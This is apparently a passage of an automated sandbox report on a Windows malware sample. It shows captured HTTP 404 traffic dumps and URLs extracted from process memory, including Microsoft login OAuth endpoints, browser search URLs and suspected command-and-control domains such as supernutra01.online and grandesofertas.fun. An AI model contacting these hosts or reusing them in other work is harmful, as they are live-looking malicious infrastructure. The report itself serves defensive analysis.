                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:22:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oiIxfgFWAwX3ZP%2Fny6yOkgCNB2rlO6IOkkuDY%2FWx6KqbuvsoweO%2BmGQyk5sHLptlMeumM48tz04SQyZYsTePMBYFvtX6pWp5jRfYbRgsVbnSM7SwYR4ZKR12nN7v%2FEj3pU4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a656edcfc338-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1458&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=717&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:22:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6%2BspKrhslZnvbJLaC9693y03YuXnmMnzuPJ1OUa4vMa%2FBJw7a%2FO58PMCNRpnVk055CeTUgOvC4IB9uUh6E6MXBjxCGTOnMIl7ffbnqUc3EJm5tkrr3%2F9IAA5dcvllGwA5yw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a667cae243b2-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2236&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=737&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 70 d9 24 e5 a7 54 da 71 d9 24 a7 e6 95 a4 16 d9 d9 64 18 a2 ab cf 30 b4 b3 d1 87 4a 73 d9 64 14 d9 c1 d4 e6 a5 67 e6 55 20 49 e9 43 8d d2 07 bb 01 00 ad 72 6b 8d 8a 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kp$Tq$d0JsdgU ICrk0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 24 Nov 2024 07:22:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjuuwbQWjW%2BOROeAWS0JYmJA8HgYGxlrySVbvOzI%2FuFj7peIu1U1LlBO6fAaEhQyxmCUxA866Yl2Wdmvbmpb5qq8vV5Sngfl6FVY26khjkVILYdOy7ETYl6cttQ92R9QV9c%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e77a6890b221921-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1424&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=471&delivery_rate=0&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 38 61 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 8a<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:01 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b af 5d 7a 6d fb 8c 75 6a e2 f8 bd 60 62 ca 88 db a3 2d d5 e1 ad 80 f7 58 8b f5 c7 be 2d 9d c0 af d5 af ed 6d 9c b2 ce ec ec b4 cf 58 4d 2b 13 92 09 63 58 1c ba b7 2a cb c5 d4 aa 96 c7 7d a7 2f 62 69 5e 8e ab f5 0a fa 8b 28 0a a2 a7 1c d0 60 eb 18 13 47 76 ab 52 16 04 a7 e4 4e 1e cb be 72 f2 33 eb 45 88 81 df c8 22 f1 53 eb b6 38 a8 ac df c2 b3 93 74 b4 34 5c bb 41 6f 9a 03 bb 6b 84 f0 15 d3 ff 3a e4 be 4e 06 56 d5 a6 60 3b fb d4 e9 0e 3a ae 33 18 4a e0 81 64 89 a8 2c 47 75 ee 74 b2 07 24 72 ae 45 4b cf 20 df 73 76 57 0e 35 fc 40 92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:04 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b af 5d 7a 6d fb 8c 75 6a e2 f8 bd 60 62 ca 88 db a3 2d d5 e1 ad 80 f7 58 8b f5 c7 be 2d 9d c0 af d5 af ed 6d 9c b2 ce ec ec b4 cf 58 4d 2b 13 92 09 63 58 1c ba b7 2a cb c5 d4 aa 96 c7 7d a7 2f 62 69 5e 8e ab f5 0a fa 8b 28 0a a2 a7 1c d0 60 eb 18 13 47 76 ab 52 16 04 a7 e4 4e 1e cb be 72 f2 33 eb 45 88 81 df c8 22 f1 53 eb b6 38 a8 ac df c2 b3 93 74 b4 34 5c bb 41 6f 9a 03 bb 6b 84 f0 15 d3 ff 3a e4 be 4e 06 56 d5 a6 60 3b fb d4 e9 0e 3a ae 33 18 4a e0 81 64 89 a8 2c 47 75 ee 74 b2 07 24 72 ae 45 4b cf 20 df 73 76 57 0e 35 fc 40 92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:06 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 4d e2 f4 53 1e 05 e4 b4 28 14 85 18 2e 87 e4 9a fb ca ee 50 34 6d 0b 48 ec a4 49 10 23 46 d3 00 05 82 16 7d a1 e8 a7 02 f2 43 8d e2 87 f2 17 76 ff 51 cf 9d d9 5d 2e 29 52 7e c4 29 2a 40 12 39 3b 73 e7 ce bd e7 9e 7b 67 66 9b a7 7b 81 2d a7 a1 60 43 e9 b9 ed 26 fd 65 b6 cb e3 b8 55 71 e2 0e ef f1 50 3a bb a2 c2 5c ee 0f 5a 95 68 5c 41 1f c1 7b ed a6 27 24 67 f6 90 47 b1 90 ad ca 7b 97 7e 69 9c c3 33 d5 ea 73 4f b4 2a 21 8f 46 8e 3f a8 30 3b f0 a5 f0 d1 29 12 83 68 6c 44 90 39 df 73 d7 11 93 30 88 64 a9 eb c4 e9 c9 61 ab 27 76 1d 5b 18 ea 4b c3 f1 1d e9 70 d7 88 6d ee 8a d6 3a 44 48 47 ba a2 3d 99 4c cc 78 e4 f2 9e e1 7c 68 06 be eb f8 a2 69 e9 47 4d 7c 19 b1 48 b8 ad 4a 2c a7 ae 88 87 42 60 16 4f f4 1c de aa 70 d7 ad b0 61 24 fa 85 ae 4a 37 83 8f 65 60 da 71 8c 19 66 e3 1d ac 22 ef dd e7 50 2b f0 4d fc d9 5c af 30 32 1f ac e5 f1 81 b0 ae 18 aa 63 bb 19 db 91 13 ca b6 75 a6 79 7a fb 8d 8b af 5d 7a 6d fb 8c 75 6a e2 f8 bd 60 62 ca 88 db a3 2d d5 e1 ad 80 f7 58 8b f5 c7 be 2d 9d c0 af d5 af ed 6d 9c b2 ce ec ec b4 cf 58 4d 2b 13 92 09 63 58 1c ba b7 2a cb c5 d4 aa 96 c7 7d a7 2f 62 69 5e 8e ab f5 0a fa 8b 28 0a a2 a7 1c d0 60 eb 18 13 47 76 ab 52 16 04 a7 e4 4e 1e cb be 72 f2 33 eb 45 88 81 df c8 22 f1 53 eb b6 38 a8 ac df c2 b3 93 74 b4 34 5c bb 41 6f 9a 03 bb 6b 84 f0 15 d3 ff 3a e4 be 4e 06 56 d5 a6 60 3b fb d4 e9 0e 3a ae 33 18 4a e0 81 64 89 a8 2c 47 75 ee 74 b2 07 24 72 ae 45 4b cf 20 df 73 76 57 0e 35 fc 40 92 4a 52 5c c1 44 c9 37 c9 51 f2 28 39 48 1e b3 e4 bb 64 3f fd 08 1f ef 25 87 e9 c7 e9 0d 7c 3e c4 ef 51 72 37 d9 a7 c7 77 d7 fc 6e 1c 6e 34 11 8c 3a 6c bb 06 a1 36 c7 ea 50 ca 30 be 60 59 88 3d 13 d1 ab 83 c1 0f fa 81 eb 06 13 e6 07 41 28 80 12 7c 40 1c 00 2d 22 02 9e 79 34 a0 98 ee 74 11 f4 23 28 f3 57 9a dd 4c 3f 4a 6f 36 2d de 6e 5a 58 47 bb b9 b0 98 81 e8 74 b2 40 37 26 11 0f 43 08 cd 0c bc d8 de 51 b1 d8 41 2c 80 15 56 76 52 6e 19 06 b1 04 87 18 b1 e4 d2 b1 e1 80 85 59 e7 6c 6d 64 f3 93 9f d6 67 d6 58 f0 88 a1 a8 a1 b2 9c 36 86 eb ed 66 b8 7a 68 4f 68 10 23 52 9f dd 55 cd 6e d4 4e 0e b5 b7 92 1f c8 8d c9 0f ca b5 0f 8e 39 73 ce e2 e1 aa 55 77 c7 52 06 7e 9c 9b 1b cb 2e 61 40 3f 84 96 fa 03 7c e0 06 51 47 39 59 f8 36 21 2d 7b 10 3b 57 45 07 ee f7 b8 ab 7c 91 99 b4 18 5f 98 2f eb af fc 02 46 2e 89 08 79 af 07 2f 75 5c 02 ce 22 f0 88 9e 35 f8 ac c9 30 70 62 6b d3 1e 0a 7b d4 5a eb a9 34 b1 84 bd d7 b8 17 6e 60 48 27 0e c6 91 2d 5a b9 06 c4 cb 95 f6 6f 48 08 e1 90 95 97 4b 61 53 56 5f 11 77 29 1a 4f 5e 4e 2f f0 b8 53 d0 7b 1e 32 25 cd 75 07 cb 17 13 6b 73 2c bd 5c b3 65 ca d3 63 4a 30 63 2f 57 7c 8d 9a 6c 2c 8a 3b 03 bf 15 c3 4c 7e af 03 51 27 af 33 f9 3b 60 f1 9f e4 80 a5 9f 26 47 e9 67 e9 4d 96 dc cf 49 e1 74 29 0e e3 90 fb 4b 10 1b 46 81 17 18 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 24 Nov 2024 07:23:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 34 66 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 6b 6c 61 64 2d 69 71 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003D38000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://narman.com/
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4528088179.0000000004E2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.supernutra01.online
                Source: NObNfBLfyhvzeH.exe, 00000006.00000002.4528088179.0000000004E2E000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.supernutra01.online/x1zr/
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: winver.exe, 00000005.00000002.4527534304.0000000005B72000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000003882000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/o
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A6C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033#p
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: winver.exe, 00000005.00000002.4525083909.0000000002A7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: winver.exe, 00000005.00000003.2569339086.00000000075EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
                Source: winver.exe, 00000005.00000002.4527534304.000000000634C000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.000000000405C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
                Source: winver.exe, 00000005.00000002.4527534304.0000000005398000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.00000000030A8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.bt.cn/?from=404
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: winver.exe, 00000005.00000003.2576035221.00000000075F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: winver.exe, 00000005.00000002.4527534304.0000000005074000.00000004.10000000.00040000.00000000.sdmp, NObNfBLfyhvzeH.exe, 00000006.00000002.4526286299.0000000002D84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2690521155.000000003ED04000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/wu6o/?8z=PAJ2EBywaoPRtAODirkpgxGfmSmLR9nxYR74cZ8tmddFXtcUCShy8K9wuzUR
